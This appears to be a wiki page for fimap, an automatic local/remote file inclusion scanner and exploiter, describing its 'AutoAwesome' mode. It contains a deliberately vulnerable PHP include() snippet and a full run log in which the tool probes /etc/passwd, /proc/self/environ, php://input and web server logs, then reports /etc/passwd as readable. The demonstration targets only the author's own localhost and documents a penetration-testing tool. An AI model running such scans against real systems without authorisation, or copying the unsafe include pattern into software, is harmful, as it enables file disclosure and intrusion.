#summary What is the 'AutoAwesome' mode?

= Introduction =
AutoAwesome Mode? Sounds Awesome! Actually it is! Here is an example:


= Exploitable PHP Code =
{{{
<?php

        if (isset($_POST["go"])){
                include($_POST["action"]); // <-- Only when the POST value 'go' is defined.
        }else{
                echo "<html>";
                echo "<body>";
                echo "<form action='test.php' method='POST'>";
                echo "<input type='hidden' name='go'>";
                echo "<input type='hidden' name='action' value='index.html'>";
                echo "<input type='submit' name='submit' value='Go'>";
                echo "</form>";
                echo "</html>";
        }
?>
}}}


= Exploiting it using AutoAwesome Mode =
{{{
imax@Develb0x:/st0rage/dev/fimap/src$ ./fimap.py -4  -u "http://localhost/~imax/fail/test.php" -C
fimap v.09_svn (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

AutoAwesome mode engaging URL 'http://localhost/~imax/fail/test.php'...
Requesting 'http://localhost/~imax/fail/test.php'...
Analyzing form 'Unnamed Form #1' for file inclusion bugs.
[05:38:30] [OUT] Inspecting URL 'http://localhost/~imax/fail/test.php'...
[05:38:30] [INFO] Fiddling around with URL...
[05:38:30] [OUT] [PHP] Possible file inclusion found! -> 'http://localhost/~imax/fail/test.php' with POST-Parameter 'action'.
[05:38:30] [OUT] [PHP] Identifying Vulnerability 'http://localhost/~imax/fail/test.php' with POST-Parameter 'action'...
[05:38:30] [INFO] Scriptpath received: '/home/imax/public_html/fail'
[05:38:30] [INFO] Operating System is 'Unix-Like'.
[05:38:30] [INFO] Testing file '/etc/passwd'...
[05:38:30] [INFO] Testing file '/proc/self/environ'...
[05:38:30] [INFO] Testing file 'php://input'...
[05:38:31] [INFO] Testing file '/var/log/apache2/access.log'...
[05:38:31] [INFO] Testing file '/var/log/apache/access.log'...
[05:38:31] [INFO] Testing file '/var/log/httpd/access.log'...
[05:38:31] [INFO] Testing file '/var/log/apache2/access_log'...
[05:38:31] [INFO] Testing file '/var/log/apache/access_log'...
[05:38:31] [INFO] Testing file '/var/log/httpd/access_log'...
[05:38:32] [INFO] Testing file 'http://www.phpbb.de/index.php'...
###########################################################
#[1] Possible PHP-File Inclusion                          #
###########################################################
#::REQUEST                                                #
#  [URL]        http://localhost/~imax/fail/test.php      #
#  [POST]       go=&action=index.html&submit=Go           #
#  [HEAD SENT]                                            #
#::VULN INFO                                              #
#  [POSTPARM]   action                                    #
#  [PATH]       /home/imax/public_html/fail               #
#  [OS]         Unix                                      #
#  [TYPE]       Absolute Clean                            #
#  [TRUNCATION] No Need. It's clean.                      #
#  [READABLE FILES]                                       #
#                   [0] /etc/passwd                       #
###########################################################
Starting harvester engine to get links (Depth: 0)...
No links found.
AutoAwesome is done.
}}}

= So what exactly happend? =
  # fimap requests the URL "http://localhost/~imax/fail/test.php" and searches any 'Set-Cookie' stuff and forms.
  # The Cookies and\or forms will be scanned automaticly for file inclusion bugs.
  # Now fimap will start the harvest engine to collect all URLs on the page.
  # Finally the links will also be scanned for file inclusion bugs.

= What's so good about it? =
  * You don't have to provide all the parameters to fimap. 
  * fimap will grab automaticly all forms, cookies and links for testing.

= What's not so good? =
Well - fimap can only find cookies, links and forms which are somewhere in the URL\HTML page you have defined with -u. Makes sense or not? :)